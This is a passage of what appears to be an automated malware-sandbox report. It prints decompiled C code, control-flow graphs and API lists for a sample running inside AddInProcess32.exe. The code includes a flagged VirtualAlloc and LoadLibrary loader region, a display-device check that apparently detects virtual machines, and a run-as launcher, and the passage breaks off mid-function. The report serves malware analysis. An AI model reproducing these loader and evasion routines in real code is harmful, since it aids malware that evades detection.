                                              • Instruction ID: 51ebdb338656fd409632222aec1f878416bda2637916f028697a32fd308e9bcb
                                              • Opcode Fuzzy Hash: ada36984a414456eb4f95f64f14468dfa1f342e4c40e7b411c3d41fd9bd7b0b8
                                              • Instruction Fuzzy Hash: AE41ECB294023CAADB219B60DD49FEBB7BCEF04240F4445E5BB09E6111EB309AD58F64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              C-Code - Quality: 82%
                                              			_entry_(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                              				struct _FILETIME _v12;
                                              				_Unknown_base(*)()* _t5;
                                              				void* _t13;
                                              
                                              				_t5 = GetProcAddress(LoadLibraryA("ntdll"), "RtlRandomEx");
                                              				 *0x2b5947c = _t5;
                                              				_t21 = _t5;
                                              				if(_t5 != 0) {
                                              					GetSystemTimeAsFileTime( &_v12);
                                              					asm("adc eax, 0xfe624e21");
                                              					 *0x2b59478 = E02B53E90(_v12.dwLowDateTime + 0x2ac18000, _v12.dwHighDateTime, 0x989680, 0); // executed
                                              					_t13 = E02B5372C(__edi, __esi, _t21); // executed
                                              					if(_t13 == 0) {
                                              						E02B5138F(__ebx, __edi, __esi);
                                              					}
                                              				}
                                              				TerminateProcess(GetCurrentProcess(), 0); // executed
                                              				return 1;
                                              			}






                                              0x02b51475
                                              0x02b5147b
                                              0x02b51480
                                              0x02b51482
                                              0x02b51488
                                              0x02b514a1
                                              0x02b514ad
                                              0x02b514b2
                                              0x02b514b9
                                              0x02b514bb
                                              0x02b514bb
                                              0x02b514b9
                                              0x02b514c9
                                              0x02b514d5

                                              APIs
                                              • LoadLibraryA.KERNEL32(ntdll,RtlRandomEx), ref: 02B5146E
                                              • GetProcAddress.KERNEL32(00000000), ref: 02B51475
                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 02B51488
                                              • __aulldiv.LIBCMT ref: 02B514A8
                                                • Part of subcall function 02B5138F: GetModuleHandleA.KERNEL32(00000000), ref: 02B513B1
                                                • Part of subcall function 02B5138F: VirtualQuery.KERNEL32(00000000,?,00001000), ref: 02B513C6
                                              • GetCurrentProcess.KERNEL32(00000000), ref: 02B514C2
                                              • TerminateProcess.KERNELBASE(00000000), ref: 02B514C9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: ProcessTime$AddressCurrentFileHandleLibraryLoadModuleProcQuerySystemTerminateVirtual__aulldiv
                                              • String ID: RtlRandomEx$ntdll$Nqt
                                              • API String ID: 491243650-2249084123
                                              • Opcode ID: 8db0a9dd6af13a53eee8f2e293350d40a5596e0dc37122c688ebc00219d0ab0f
                                              • Instruction ID: fd3bc3ee58b7b887c60e0f3cdf4cfb045be20461a978b0e161e5f634aed4bb69
                                              • Opcode Fuzzy Hash: 8db0a9dd6af13a53eee8f2e293350d40a5596e0dc37122c688ebc00219d0ab0f
                                              • Instruction Fuzzy Hash: 1AF04475D94328ABD610AFB49C49B6A37BCDF04289F180894B906DB240EA74D4508F20
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 188 2b52fd4-2b53013 189 2b5306a-2b5306e EnumDisplayDevicesA 188->189 190 2b53015-2b53041 call 2b52ce7 EnumDisplayDevicesA 189->190 191 2b53070-2b53084 call 2b53c33 189->191 196 2b53056-2b53068 GetLastError 190->196 197 2b53043-2b53054 StrStrA 190->197 196->189 197->196 198 2b53085-2b53088 197->198 198->191
                                              C-Code - Quality: 21%
                                              			E02B52FD4(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				char _v432;
                                              				long _v436;
                                              				struct _DISPLAY_DEVICEA _v860;
                                              				signed int _t11;
                                              				char* _t22;
                                              				char* _t27;
                                              				void* _t39;
                                              				signed int _t41;
                                              
                                              				_t43 = (_t41 & 0xfffffff8) - 0x35c;
                                              				_t11 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t11 ^ (_t41 & 0xfffffff8) - 0x0000035c;
                                              				_t27 = __ecx;
                                              				_v436 = 0x1a8;
                                              				_push(0);
                                              				_push( &_v436);
                                              				_push(0);
                                              				_t39 = 0;
                                              				_push(0);
                                              				while(EnumDisplayDevicesA() != 0) {
                                              					E02B52CE7(_t14,  &_v860, 0x1a8);
                                              					_v860.cb = 0x1a8;
                                              					if(EnumDisplayDevicesA( &_v432, 0,  &_v860, 0) == 0) {
                                              						L3:
                                              						GetLastError();
                                              						_push(0);
                                              						_t39 = _t39 + 1;
                                              						_push( &_v436);
                                              						_push(_t39);
                                              						_push(0);
                                              						continue;
                                              					} else {
                                              						_t22 = StrStrA( &(_v860.DeviceID), _t27); // executed
                                              						if(_t22 == 0) {
                                              							goto L3;
                                              						}
                                              					}
                                              					break;
                                              				}
                                              				return E02B53C33(_v12 ^ _t43);
                                              			}













                                              0x02b52fda
                                              0x02b52fe0
                                              0x02b52fe7
                                              0x02b52ffe
                                              0x02b53000
                                              0x02b5300d
                                              0x02b5300e
                                              0x02b5300f
                                              0x02b53010
                                              0x02b53012
                                              0x02b5306a
                                              0x02b5301e
                                              0x02b5302a
                                              0x02b53041
                                              0x02b53056
                                              0x02b53056
                                              0x02b5305c
                                              0x02b53065
                                              0x02b53066
                                              0x02b53067
                                              0x02b53068
                                              0x00000000
                                              0x02b53043
                                              0x02b5304c
                                              0x02b53054
                                              0x00000000
                                              0x00000000
                                              0x02b53054
                                              0x00000000
                                              0x02b53041
                                              0x02b53084

                                              APIs
                                              • EnumDisplayDevicesA.USER32(?,00000000,?,00000000), ref: 02B5303D
                                              • StrStrA.KERNELBASE(?,?), ref: 02B5304C
                                              • GetLastError.KERNEL32 ref: 02B53056
                                              • EnumDisplayDevicesA.USER32(00000000,00000000,?,00000000), ref: 02B5306A
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: DevicesDisplayEnum$ErrorLast
                                              • String ID:
                                              • API String ID: 2855626068-0
                                              • Opcode ID: e8445ef92b0d0f6d22d70e45a758134cc488de82347c465936d899295f94b6dd
                                              • Instruction ID: 3360150db0bf5159a6aecf5797f8acb0d88d5e8f114bed5db27d0a6bb54e9a68
                                              • Opcode Fuzzy Hash: e8445ef92b0d0f6d22d70e45a758134cc488de82347c465936d899295f94b6dd
                                              • Instruction Fuzzy Hash: 4F11CE71A58354ABE3609B64DC45FEB73ECEF84791F04096DA949CA180EB70A904CAA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 199 1380570-13805eb 200 13805f2-13805fb 199->200 201 13806e8-13806f0 200->201 202 1380601-1380615 call 1380500 200->202 205 138061b-1380630 202->205 206 13806e1 202->206 207 1380633-1380639 205->207 206->201 208 138063f-1380651 207->208 209 13806c4-13806e3 207->209 211 1380683-13806a6 LoadLibraryA 208->211 212 1380653-1380681 208->212 209->200 213 13806ab 211->213 215 13806ae-13806bf 212->215 213->215 215->207
                                              APIs
                                              • LoadLibraryA.KERNELBASE(00000000,00000000,?,?,?,?,00000000), ref: 013806A0
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_1380000_AddInProcess32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: e937006d0eac38888625c5fba067e9f893380eca7e5b8aa9e88496690ea0c380
                                              • Instruction ID: 29651db6f21e1dc7e5a824a02163724dd5bb7c1d46e4515f6b3a7b63ffcef279
                                              • Opcode Fuzzy Hash: e937006d0eac38888625c5fba067e9f893380eca7e5b8aa9e88496690ea0c380
                                              • Instruction Fuzzy Hash: 055180B4E00209EFDB48DF98D890BADBBB5FF48318F14815AE919A7351D730A945CF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 217 1380700-1380762 VirtualAlloc 218 138076b-1380774 217->218 219 1380764-1380766 217->219 221 1380777-1380780 218->221 220 1380868-138086e 219->220 222 138079d-13807b7 221->222 223 1380782-138079b 221->223 224 13807c2-13807cc 222->224 223->221 225 13807ce-13807f0 224->225 226 1380824-138084f call 1380870 call 1380570 224->226 228 13807f3-13807fc 225->228 234 1380854-1380865 226->234 230 1380819-1380822 228->230 231 13807fe-1380817 228->231 230->224 231->228 234->220
                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,013809F4,00001000,00000040), ref: 01380759
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392576863.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_1380000_AddInProcess32.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: b02edd85b4b2e0ba4da0d4ead806a640de917280d28bcf58c2f3eec5a6372bc3
                                              • Instruction ID: 7605dafe9dce02513b7ad03750b69aba366e3239da7ce84bd9beab4616c8ac60
                                              • Opcode Fuzzy Hash: b02edd85b4b2e0ba4da0d4ead806a640de917280d28bcf58c2f3eec5a6372bc3
                                              • Instruction Fuzzy Hash: C9516DB4E00209EFCB08DF98D591AEDBBB5BF48318F144099E915AB351D731AA94CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 245 402050-402143 call 409280 * 5 call 401800 258 402881-402925 LoadIconW * 2 LoadCursorW RegisterClassExW CreateDialogParamW GetMessageW 245->258 259 402149-402167 call 40346a 245->259 261 402927-402935 IsDialogMessageW 258->261 262 40295e 258->262 259->258 267 40216d-40217f call 40346a 259->267 264 402937-402947 TranslateMessage DispatchMessageW 261->264 265 40294d-40295c GetMessageW 261->265 266 402966-402989 LocalFree call 40318a 262->266 264->265 265->261 265->262 272 402185-40218c 267->272 273 40227f-402291 call 40346a 267->273 275 4023a1-4023d1 call 4036e5 call 4029c0 272->275 276 402192-4021a9 call 40346a 272->276 280 4022d0-4022e2 call 40346a 273->280 281 402293-402296 273->281 295 4023d3-4023e1 call 401880 275->295 296 4023e6-40240e call 402f60 275->296 287 4021ab-4021b8 SetEnvironmentVariableW 276->287 288 4021be-4021c0 276->288 297 402321-402333 call 40346a 280->297 298 4022e4-4022e7 280->298 285 4022b3 281->285 286 402298-4022b1 call 40346a 281->286 292 4022b7-4022cb call 401ba0 285->292 286->285 286->292 287->288 288->275 293 4021c6-40226a call 409280 call 4036e5 call 40366b CreateProcessW 288->293 292->266 293->266 333 402270-40227a GetLastError 293->333 295->266 296->266 317 402414-40248e call 409280 * 3 call 402cb0 296->317 319 402370-402382 call 40346a 297->319 320 402335-402338 297->320 303 402304 298->303 304 4022e9-402302 call 40346a 298->304 312 402308-40231c call 401ba0 303->312 304->303 304->312 312->266 317->266 345 402494-4024f6 CreateProcessWithLogonW 317->345 319->275 335 402384-40238c 319->335 325 402355 320->325 326 40233a-402353 call 40346a 320->326 328 402359-40236b call 401930 325->328 326->325 326->328 328->266 333->266 338 40239e 335->338 339 40238e-40239a 335->339 338->275 339->338 346 402504-402506 345->346 347 4024f8-402502 GetLastError 345->347 348 40254b-402553 346->348 349 402508-402531 call 403926 call 40360d 346->349 347->348 348->317 351 402559-402561 348->351 349->348 358 402533-402545 EnumWindows 349->358 351->317 353 402567-40256f 351->353 353->317 355 402575-40257d 353->355 355->317 357 402583-402588 355->357 357->317 359 40258e-402596 357->359 358->348 360 402835-40283f 358->360 359->317 361 40259c-4025a4 359->361 362 402840-402845 360->362 361->317 363 4025aa-4025b2 361->363 365 402847-40284e 362->365 366 402868-40287c CloseHandle * 2 362->366 363->317 364 4025b8-4025bd 363->364 364->317 367 4025c3-4025cb 364->367 365->366 368 402850-402866 Sleep EnumWindows 365->368 366->266 367->317 369 4025d1-4025d9 367->369 368->362 368->366 369->317 370 4025df-4025e7 369->370 370->317 371 4025ed-4025f5 370->371 371->317 372 4025fb-402603 371->372 372->317 373 402609-402611 372->373 373->317 374 402617-40261f 373->374 374->317 375 402625-40262d 374->375 375->317 376 402633-40263b 375->376 376->317 377 402641-402649 376->377 377->317 378 40264f-402657 377->378 378->317 379 40265d-402665 378->379 379->317 380 40266b-402673 379->380 380->317 381 402679-402681 380->381 381->317 382 402687-40268f 381->382 382->317 383 402695-40269d 382->383 383->317 384 4026a3-4026ab 383->384 384->317 385 4026b1-4026b9 384->385 385->317 386 4026bf-4026c7 385->386 386->317 387 4026cd-4026d5 386->387 387->317 388 4026db-4026e3 387->388 388->317 389 4026e9-4026f1 388->389 389->317 390 4026f7-4026ff 389->390 390->317 391 402705-40270d 390->391 391->317 392 402713-40271b 391->392 392->317 393 402721-402729 392->393 393->317 394 40272f-402737 393->394 394->317 395 40273d-402745 394->395 395->317 396 40274b-402753 395->396 396->317 397 402759-402761 396->397 397->317 398 402767-40276f 397->398 398->317 399 402775-40277d 398->399 399->317 400 402783-40278b 399->400 400->317 401 402791-402799 400->401 401->317 402 40279f-4027a7 401->402 402->317 403 4027ad-4027b5 402->403 403->317 404 4027bb-4027c3 403->404 404->317 405 4027c9-4027d1 404->405 405->317 406 4027d7-4027df 405->406 406->317 407 4027e5-4027ed 406->407 407->317 408 4027f3-4027fb 407->408 408->317 409 402801-402809 408->409 409->317 410 40280f-402818 409->410 410->317 411 40281e-402820 410->411 411->366 412 402822-402830 call 401880 411->412 412->266
                                              C-Code - Quality: 75%
                                              			E00402050(struct HINSTANCE__* __ecx, intOrPtr __edx, void* __eflags, void* _a4) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				short _v1052;
                                              				char _v2082;
                                              				char _v2084;
                                              				char _v2762;
                                              				char _v2764;
                                              				char _v3282;
                                              				char _v3284;
                                              				char _v3802;
                                              				char _v3804;
                                              				struct _STARTUPINFOW _v3876;
                                              				short _v3900;
                                              				short _v3904;
                                              				char _v3944;
                                              				struct HWND__* _v3948;
                                              				struct _WNDCLASSEXW _v4024;
                                              				struct _PROCESS_INFORMATION _v4040;
                                              				struct HWND__* _v4044;
                                              				intOrPtr _v4048;
                                              				intOrPtr _v4052;
                                              				intOrPtr _v4056;
                                              				char _v4060;
                                              				void* _v4064;
                                              				char _v4068;
                                              				void* _v4072;
                                              				char _v4073;
                                              				intOrPtr _v4080;
                                              				void* _v4081;
                                              				struct HWND__* _v4088;
                                              				intOrPtr _v4092;
                                              				void* _v4096;
                                              				void* _v4100;
                                              				void* _v4104;
                                              				void* _v4132;
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t183;
                                              				void* _t193;
                                              				void* _t199;
                                              				intOrPtr _t201;
                                              				void* _t203;
                                              				void* _t205;
                                              				void* _t208;
                                              				void* _t210;
                                              				void* _t211;
                                              				void* _t213;
                                              				void* _t214;
                                              				void* _t215;
                                              				void* _t218;
                                              				void* _t220;
                                              				void* _t227;
                                              				void* _t229;
                                              				void* _t230;
                                              				void* _t237;
                                              				void* _t238;
                                              				intOrPtr _t239;
                                              				int _t240;
                                              				short _t244;
                                              				struct HWND__* _t245;
                                              				void* _t247;
                                              				signed int _t248;
                                              				struct HWND__* _t251;
                                              				void* _t252;
                                              				short _t253;
                                              				struct HWND__* _t255;
                                              				void* _t257;
                                              				void* _t258;
                                              				void* _t272;
                                              				void* _t274;
                                              				void* _t275;
                                              				intOrPtr _t333;
                                              				void* _t339;
                                              				intOrPtr _t340;
                                              				struct HINSTANCE__* _t344;
                                              				struct HWND__* _t345;
                                              				void* _t346;
                                              				void* _t352;
                                              				signed int _t353;
                                              				signed int _t354;
                                              				signed int _t356;
                                              				signed int _t361;
                                              				void* _t362;
                                              				void* _t363;
                                              				void* _t364;
                                              				void* _t365;
                                              				void* _t367;
                                              
                                              				_t356 = (_t354 & 0xfffffff8) - 0xff4;
                                              				_t183 =  *0x413004; // 0x98fc836b
                                              				_v8 = _t183 ^ _t356;
                                              				_t333 = __edx;
                                              				_t344 = __ecx;
                                              				_v4080 = __edx;
                                              				_v4088 = 0;
                                              				_v2764 = 0;
                                              				E00409280(__edx,  &_v2762, 0, 0x2a2);
                                              				_v2084 = 0;
                                              				E00409280(_t333,  &_v2082, 0, 0x402);
                                              				_v3284 = 0;
                                              				E00409280(_t333,  &_v3282, 0, 0x200);
                                              				_v3804 = 0;
                                              				E00409280(_t333,  &_v3802, 0, 0x206);
                                              				_v3948 = 0;
                                              				E00409280(_t333,  &_v3944, 0, 0x40);
                                              				_v4060 = 0;
                                              				_v4068 = 0;
                                              				_v4044 = 0;
                                              				_v4072 = 0;
                                              				_v4081 = 0;
                                              				_v4073 = 0;
                                              				_t361 = _t356 + 0x3c;
                                              				_v4056 = 0;
                                              				_v4052 = 0;
                                              				_v4048 = 0;
                                              				_t193 = E00401800(_t333,  &_a4, _t344);
                                              				_t272 = _a4;
                                              				if(_t272 < 2) {
                                              					L96:
                                              					_v4024.cbSize = 0x30;
                                              					_v4024.style = 3;
                                              					_v4024.lpfnWndProc = E00401D50;
                                              					_v4024.cbClsExtra = 0;
                                              					_v4024.cbWndExtra = 0x1e;
                                              					_v4024.hInstance = _t344;
                                              					_v4024.hIcon = LoadIconW(_t344, L"ICON");
                                              					_v4024.hIconSm.hwnd = LoadIconW(_t344, L"ICON");
                                              					_v4024.hCursor = LoadCursorW(0, 0x7f00);
                                              					_v4024.hbrBackground = 0x10;
                                              					_v4024.lpszMenuName = 0;
                                              					_v4024.lpszClassName = L"SHELLRUNAS";
                                              					RegisterClassExW( &_v4024);
                                              					_t345 = CreateDialogParamW(_t344, L"AboutUsage", 0, E00401D50, 0);
                                              					_t199 = GetMessageW( &(_v4024.hIconSm), 0, 0, 0);
                                              					__eflags = _t199;
                                              					if(_t199 == 0) {
                                              						L100:
                                              						_v4092 = 0x57;
                                              						L101:
                                              						LocalFree(_v4072);
                                              						_t201 = _v4092;
                                              						_pop(_t346);
                                              						_pop(_t274);
                                              						E0040318A(_t201, _t274, _v12 ^ _t361, _t346);
                                              						return _t201;
                                              					} else {
                                              						goto L97;
                                              					}
                                              					do {
                                              						L97:
                                              						_t203 = IsDialogMessageW(_t345,  &(_v4024.hIconSm));
                                              						__eflags = _t203;
                                              						if(_t203 == 0) {
                                              							TranslateMessage( &(_v4024.hIconSm));
                                              							DispatchMessageW( &(_v4024.hIconSm));
                                              						}
                                              						_t205 = GetMessageW( &(_v4024.hIconSm), 0, 0, 0);
                                              						__eflags = _t205;
                                              					} while (_t205 != 0);
                                              					goto L100;
                                              				}
                                              				_t339 = _v4080 + 4;
                                              				_v4064 = _t339;
                                              				_t208 = E0040346A(_t193,  *(_v4080 + 4), L"/?");
                                              				_t361 = _t361 + 8;
                                              				if(_t208 == 0) {
                                              					goto L96;
                                              				}
                                              				_t210 = E0040346A( *_t339,  *_t339, L"/raw");
                                              				_t362 = _t361 + 8;
                                              				if(_t210 != 0) {
                                              					_t312 =  *_t339;
                                              					_t211 = E0040346A(_t210,  *_t339, L"/reg");
                                              					_t363 = _t362 + 8;
                                              					__eflags = _t211;
                                              					if(_t211 != 0) {
                                              						_t213 = E0040346A( *_t339,  *_t339, L"/regnetonly");
                                              						_t364 = _t363 + 8;
                                              						__eflags = _t213;
                                              						if(_t213 != 0) {
                                              							_t285 =  *_t339;
                                              							_t214 = E0040346A(_t213,  *_t339, L"/unreg");
                                              							_t365 = _t364 + 8;
                                              							__eflags = _t214;
                                              							if(_t214 != 0) {
                                              								_t215 = E0040346A(_t214,  *_t339, L"/netonly");
                                              								_t362 = _t365 + 8;
                                              								__eflags = _t215;
                                              								if(_t215 == 0) {
                                              									__eflags = _t272 - 2;
                                              									_v4072 = 1;
                                              									if(_t272 > 2) {
                                              										_t352 = _v4080 + 8;
                                              										__eflags = _t352;
                                              										memcpy(_t339, _t352, _t272 - 2 << 2);
                                              										_t362 = _t362 + 0xc;
                                              										_t339 = _v4064;
                                              									}
                                              									__eflags = _t272;
                                              								}
                                              								L28:
                                              								E004036E5( *_t339,  &_v3804, 0x104,  *_t339);
                                              								_t218 = E004029C0( *_t339, __eflags,  &_v3804);
                                              								_t367 = _t362 + 0x10;
                                              								__eflags = _t218;
                                              								_v4088 = _t218;
                                              								if(__eflags == 0) {
                                              									_push( &_v4068);
                                              									_push(_v4072);
                                              									_push(_v4080);
                                              									_t220 = E00402F60(_t272,  &_v4073,  &_v3804, __eflags);
                                              									_t361 = _t367 + 0xc;
                                              									__eflags = _t220;
                                              									_v4088 = _t220;
                                              									if(_t220 != 0) {
                                              										goto L101;
                                              									} else {
                                              										goto L31;
                                              									}
                                              									while(1) {
                                              										L31:
                                              										E00409280(_t339,  &_v2084, 0, 0x202);
                                              										E00409280(_t339,  &_v2764, 0, 0x152);
                                              										E00409280(_t339,  &_v3284, 0, 0x101);
                                              										_push(_v4088);
                                              										_push( &_v3284);
                                              										_push( &_v2084);
                                              										_push(_v4072);
                                              										_t339 =  &_v2764;
                                              										_t227 = E00402CB0( *_v4064, _t339, __eflags);
                                              										_t361 = _t361 + 0x34;
                                              										__eflags = _t227;
                                              										_v4088 = _t227;
                                              										if(_t227 != 0) {
                                              											goto L101;
                                              										}
                                              										_t275 = _v4072;
                                              										__eflags = _t275;
                                              										_t229 =  &_v3284;
                                              										_v3948 = 0x44;
                                              										_v3904 = 1;
                                              										_v3900 = 1;
                                              										__imp__CreateProcessWithLogonW( &_v2084, _t339, _t229, (0 | _t275 != 0x00000000) + 1, 0, _v4068, 0, 0, 0,  &_v3948,  &_v4060);
                                              										__eflags = _t229;
                                              										if(_t229 != 0) {
                                              											__eflags = _t275;
                                              											if(_t275 == 0) {
                                              												L37:
                                              												__eflags = _v4132 - 0x52e;
                                              												if(_v4132 == 0x52e) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x8007052e;
                                              												if(_v4132 == 0x8007052e) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc000006d;
                                              												if(_v4132 == 0xc000006d) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd000006d;
                                              												if(_v4132 == 0xd000006d) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 5;
                                              												if(_v4132 == 5) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x80070005;
                                              												if(_v4132 == 0x80070005) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc0000022;
                                              												if(_v4132 == 0xc0000022) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd0000022;
                                              												if(_v4132 == 0xd0000022) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x56;
                                              												if(_v4132 == 0x56) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x80070056;
                                              												if(_v4132 == 0x80070056) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc000006a;
                                              												if(_v4132 == 0xc000006a) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd000006a;
                                              												if(_v4132 == 0xd000006a) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x8009030e;
                                              												if(_v4132 == 0x8009030e) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x8009030c;
                                              												if(_v4132 == 0x8009030c) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x4f1;
                                              												if(_v4132 == 0x4f1) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x800704f1;
                                              												if(_v4132 == 0x800704f1) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc0000388;
                                              												if(_v4132 == 0xc0000388) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd0000388;
                                              												if(_v4132 == 0xd0000388) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x532;
                                              												if(_v4132 == 0x532) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x80070532;
                                              												if(_v4132 == 0x80070532) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc0000071;
                                              												if(_v4132 == 0xc0000071) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd0000071;
                                              												if(_v4132 == 0xd0000071) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x773;
                                              												if(_v4132 == 0x773) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x80070773;
                                              												if(_v4132 == 0x80070773) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc0000224;
                                              												if(_v4132 == 0xc0000224) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd0000224;
                                              												if(_v4132 == 0xd0000224) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x8c2;
                                              												if(_v4132 == 0x8c2) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x800708c2;
                                              												if(_v4132 == 0x800708c2) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x78f;
                                              												if(_v4132 == 0x78f) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x8007078f;
                                              												if(_v4132 == 0x8007078f) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc0000413;
                                              												if(_v4132 == 0xc0000413) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd0000413;
                                              												if(_v4132 == 0xd0000413) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x533;
                                              												if(_v4132 == 0x533) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x80070533;
                                              												if(_v4132 == 0x80070533) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc0000072;
                                              												if(_v4132 == 0xc0000072) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd0000072;
                                              												if(_v4132 == 0xd0000072) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x52f;
                                              												if(_v4132 == 0x52f) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x8007052f;
                                              												if(_v4132 == 0x8007052f) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc000006e;
                                              												if(_v4132 == 0xc000006e) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd000006e;
                                              												if(_v4132 == 0xd000006e) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x775;
                                              												if(_v4132 == 0x775) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x80070775;
                                              												if(_v4132 == 0x80070775) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc0000234;
                                              												if(_v4132 == 0xc0000234) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd0000234;
                                              												if(_v4132 == 0xd0000234) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x701;
                                              												if(_v4132 == 0x701) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x80070701;
                                              												if(_v4132 == 0x80070701) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc0000193;
                                              												if(_v4132 == 0xc0000193) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xd0000193;
                                              												if(_v4132 == 0xd0000193) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x569;
                                              												if(_v4132 == 0x569) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0x80070569;
                                              												if(_v4132 == 0x80070569) {
                                              													continue;
                                              												}
                                              												__eflags = _v4132 - 0xc000015b;
                                              												if(_v4132 == 0xc000015b) {
                                              													continue;
                                              												}
                                              												_t230 = _v4132;
                                              												__eflags = _t230 - 0xd000015b;
                                              												if(_t230 == 0xd000015b) {
                                              													continue;
                                              												}
                                              												__eflags = _t230;
                                              												if(_t230 == 0) {
                                              													L95:
                                              													CloseHandle(_v4104);
                                              													CloseHandle(_v4100);
                                              													goto L101;
                                              												}
                                              												E00401880(L"Error launching application", _t230);
                                              												_t361 = _t361 + 4;
                                              												goto L101;
                                              											}
                                              											E00403926( &(_v3876.dwYSize), 0x104);
                                              											_t237 = E0040360D( &(_v3876.dwYSize), L"cmd.exe");
                                              											_t361 = _t361 + 0x10;
                                              											__eflags = _t237;
                                              											if(_t237 != 0) {
                                              												goto L37;
                                              											}
                                              											_t238 = EnumWindows(E00402000,  &_v4096);
                                              											__eflags = _t238;
                                              											if(_t238 != 0) {
                                              												_t340 = _v4092;
                                              												while(1) {
                                              													__eflags = _v4100;
                                              													if(_v4100 == 0) {
                                              														goto L95;
                                              													}
                                              													_t239 = _t340;
                                              													_t340 = _t340 + 1;
